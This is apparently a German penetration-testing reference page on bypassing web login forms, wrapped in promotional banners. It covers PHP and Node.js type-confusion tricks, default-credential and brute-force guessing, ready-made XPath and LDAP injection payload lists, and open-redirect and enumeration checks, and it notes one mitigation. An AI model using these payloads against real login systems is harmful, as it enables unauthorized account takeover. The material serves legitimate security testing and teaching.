Login Bypass

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

RootedCON ist die relevanteste Cybersicherheitsveranstaltung in Spanien und eine der wichtigsten in Europa. Mit der Mission, technisches Wissen zu fördern, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsfachleute in jeder Disziplin.

Bypass der regulären Anmeldung

Wenn Sie eine Anmeldeseite finden, finden Sie hier einige Techniken, um sie zu umgehen:

  • Überprüfen Sie Kommentare auf der Seite (nach unten und nach rechts scrollen?)

  • Überprüfen Sie, ob Sie auf die eingeschränkten Seiten direkt zugreifen können

  • Überprüfen Sie, ob Sie die Parameter nicht senden (keine oder nur 1 senden)

  • Überprüfen Sie den PHP-Vergleichsfehler: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Ändern Sie den Inhaltstyp in JSON und senden Sie JSON-Werte (bool true eingeschlossen)

  • Wenn Sie eine Antwort erhalten, dass POST nicht unterstützt wird, können Sie versuchen, das JSON im Body, aber mit einer GET-Anfrage mit Content-Type: application/json zu senden

  • Überprüfen Sie potenzielle Parsing-Fehler in Node.js (lesen Sie dies): password[password]=1

  • Node.js wird diese Nutzlast in eine ähnliche Abfrage umwandeln: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; wodurch das Passwort immer wahr wird.

  • Wenn Sie ein JSON-Objekt senden können, können Sie "password":{"password": 1} senden, um die Anmeldung zu umgehen.

  • Denken Sie daran, dass Sie für das Umgehen dieser Anmeldung immer noch einen gültigen Benutzernamen kennen und senden müssen.

  • Das Hinzufügen der Option "stringifyObjects":true beim Aufruf von mysql.createConnection wird schließlich alle unerwarteten Verhaltensweisen blockieren, wenn Object als Parameter übergeben wird.

  • Überprüfen Sie Anmeldeinformationen:

  • Standardanmeldeinformationen der verwendeten Technologie/Plattform

  • Gängige Kombinationen (root, admin, password, Name der Technologie, Standardbenutzer mit einem dieser Passwörter).

  • Erstellen Sie ein Wörterbuch mit Cewl, fügen Sie den Standard-Benutzernamen und das Passwort (falls vorhanden) hinzu und versuchen Sie, es mit allen Wörtern als Benutzernamen und Passwort per Brute-Force zu knacken

  • Brute-Force mit einem größeren Wörterbuch (Brute force)

SQL-Injection-Authentifizierungsumgehung

Hier finden Sie mehrere Tricks, um die Anmeldung über SQL-Injections zu umgehen.

Auf der folgenden Seite finden Sie eine benutzerdefinierte Liste, um die Anmeldung über SQL-Injections zu umgehen:

pageLogin bypass List

No-SQL-Injection-Authentifizierungsumgehung

Hier finden Sie mehrere Tricks, um die Anmeldung über No-SQL-Injections zu umgehen.

Da NoSQL-Injections erfordern, dass der Wert der Parameter geändert wird, müssen Sie sie manuell testen.

XPath-Injection-Authentifizierungsumgehung

Hier finden Sie mehrere Tricks, um die Anmeldung über XPath-Injections zu umgehen

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP-Injektion zur Umgehung der Authentifizierung

Hier finden Sie mehrere Tricks zur Umgehung der Anmeldung über LDAP-Injektion.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Remember Me

Wenn die Seite die Funktion "Remember Me" hat, überprüfen Sie, wie sie implementiert ist, und sehen Sie, ob Sie sie missbrauchen können, um andere Konten zu übernehmen.

Weiterleitungen

Seiten leiten Benutzer normalerweise nach dem Login weiter. Überprüfen Sie, ob Sie diese Weiterleitung ändern können, um eine Offene Weiterleitung zu verursachen. Vielleicht können Sie einige Informationen (Codes, Cookies...) stehlen, wenn Sie den Benutzer auf Ihre Website umleiten.

Weitere Überprüfungen

  • Überprüfen Sie, ob Sie Benutzernamen durch den Missbrauch der Login-Funktion enumerieren können.

  • Überprüfen Sie, ob die Autovervollständigung in den Passwort-/sensiblen Informationsformularen aktiv ist: <input autocomplete="false"

​​RootedCON ist die relevanteste Cybersicherheitsveranstaltung in Spanien und eine der wichtigsten in Europa. Mit dem Ziel, technisches Wissen zu fördern, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsprofis in jeder Disziplin.

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Last updated